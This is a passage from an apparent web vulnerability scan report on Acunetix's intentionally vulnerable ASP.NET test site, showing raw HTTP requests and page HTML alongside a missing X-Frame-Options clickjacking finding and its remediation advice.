          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 17859
          
          
          Response body (17859 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyY2RkZNGFyTb9L/R3K+NgG4eTH6G64d5v" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKblqunCgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8M7PLE5RqS1nNbgt2x8WWJp0h2GA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.

        23. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (455 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Content-Length: 6567
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (6567 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaX